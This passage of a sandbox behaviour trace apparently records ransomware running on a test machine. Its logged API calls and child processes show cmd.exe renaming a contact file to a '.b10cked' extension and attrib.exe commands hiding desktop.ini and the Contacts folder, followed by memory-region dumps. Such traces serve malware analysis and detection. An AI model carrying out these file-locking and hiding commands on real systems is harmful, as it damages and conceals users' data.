Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0208.653] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0208.654] GetConsoleTitleW (in: lpConsoleTitle=0x1908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.654] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.654] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0208.654] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0208.654] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0208.655] _wcsicmp (_String1="move", _String2=")") returned 68 [0208.655] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0208.655] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0208.655] _wcsicmp (_String1="IF", _String2="move") returned -4 [0208.655] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0208.655] _wcsicmp (_String1="REM", _String2="move") returned 5 [0208.655] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0208.657] GetConsoleTitleW (in: lpConsoleTitle=0x18f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.658] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0208.658] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="CD") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 
[0208.658] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="REN") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="SET") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0208.658] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0208.658] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0208.658] _wcsicmp (_String1="move", _String2="MD") returned 11 [0208.658] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0208.658] _wcsicmp (_String1="move", _String2="RD") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0208.658] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0208.658] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0208.658] _wcsicmp (_String1="move", _String2="VER") returned -9 [0208.658] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0208.658] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0208.658] _wcsicmp (_String1="move", _String2="START") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0208.658] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0208.660] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.660] GetDriveTypeW (lpRootPathName="C:\\") returned 
0x3 [0208.660] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f164, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f15c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f15c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0208.661] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0208.661] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0208.661] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0208.661] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0208.661] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\default\\contacts\\admini~1.con")) returned 0x20 [0208.661] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.661] SetErrorMode (uMode=0x0) returned 0x0 [0208.661] SetErrorMode (uMode=0x1) returned 0x0 [0208.661] GetFullPathNameW (in: 
lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x18eaec, lpFilePart=0x18ead4 | out: lpBuffer="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", lpFilePart=0x18ead4*="ADMINI~1.CON") returned 0x26 [0208.661] SetErrorMode (uMode=0x0) returned 0x1 [0208.661] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts" (normalized: "c:\\users\\default\\contacts")) returned 0x11 [0208.662] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0208.662] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0208.662] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\default\\contacts\\admini~1.con")) returned 0x20 [0208.662] SetErrorMode (uMode=0x0) returned 0x0 [0208.662] SetErrorMode (uMode=0x1) returned 0x0 [0208.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x18ef68, lpFilePart=0x18ed00 | out: lpBuffer="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", lpFilePart=0x18ed00*="ADMINI~1.CON") returned 0x26 [0208.662] SetErrorMode (uMode=0x0) returned 0x1 [0208.662] SetErrorMode (uMode=0x0) returned 0x0 [0208.662] SetErrorMode (uMode=0x1) returned 0x0 [0208.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x18f170, lpFilePart=0x18ed00 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x18ed00*="Administrator.contact.b10cked") returned 0x37 [0208.662] SetErrorMode (uMode=0x0) returned 0x1 [0208.662] SetLastError (dwErrCode=0x0) [0208.662] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\default\\contacts\\administrator.contact.b10cked")) returned 0xffffffff [0208.662] GetLastError () returned 0x2 [0208.662] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, 
lpFindFileData=0x18e67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e67c) returned 0x190e58 [0208.662] FindNextFileW (in: hFindFile=0x190e58, lpFindFileData=0x18e67c | out: lpFindFileData=0x18e67c) returned 0 [0208.663] GetLastError () returned 0x12 [0208.663] FindClose (in: hFindFile=0x190e58 | out: hFindFile=0x190e58) returned 1 [0208.663] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0x1a1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1bd8) returned 0x190e58 [0208.664] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x18e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x0) returned 0x37 [0208.664] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x104, lpBuffer=0x18e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0208.664] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact")) returned 0x20 [0208.664] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\default\\contacts\\administrator.contact.b10cked"), dwFlags=0x3) returned 1 [0208.664] FindClose (in: hFindFile=0x190e58 | out: hFindFile=0x190e58) returned 1 [0208.664] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8c8 | out: _Buffer=" 1") returned 9 [0208.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.664] GetFileType (hFile=0x7) returned 0x2 [0208.664] 
GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.664] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e854 | out: lpMode=0x18e854) returned 1 [0208.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.665] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e888 | out: lpConsoleScreenBufferInfo=0x18e888) returned 1 [0209.158] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0209.159] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e8c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0209.159] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8ac*=0x1a) returned 1 [0209.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.159] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.159] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0209.159] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.159] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0209.160] SetConsoleInputExeNameW () returned 0x1 [0209.160] GetConsoleOutputCP () returned 0x1b5 [0209.160] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.160] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.160] exit (_Code=0) Process: id = "509" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x3a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "507" os_parent_pid = "0x140" 
cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30877 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30878 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30879 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30880 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 30881 start_va = 0x170000 end_va = 0x176fff entry_point = 0x170000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30882 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30883 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30884 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 
30885 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 30886 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30887 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30888 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30889 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30890 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 30891 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 30892 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30893 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30894 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30895 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 30896 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30897 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30898 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30899 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30900 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30901 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30902 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30903 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30904 start_va = 0x180000 end_va = 0x247fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 30905 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30906 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 710 os_tid = 0xf98 Process: id = "510" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "507" os_parent_pid = "0x140" cmd_line = "attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30907 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30908 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30909 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30910 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 30911 start_va = 0xb10000 end_va = 0xb16fff entry_point = 0xb10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" 
(normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30912 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30913 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30914 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30915 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30916 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30918 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30919 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30920 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 30921 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30922 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: 
"c:\\windows\\system32\\ulib.dll") Region: id = 30923 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30924 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30925 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30926 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30927 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30928 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30929 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30930 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30931 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" 
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30932 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30933 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30934 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30935 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30936 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 711 os_tid = 0x6f0 Process: id = "511" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "507" os_parent_pid = "0x140" cmd_line = "attrib +h \"C:\\Users\\Default\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30937 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
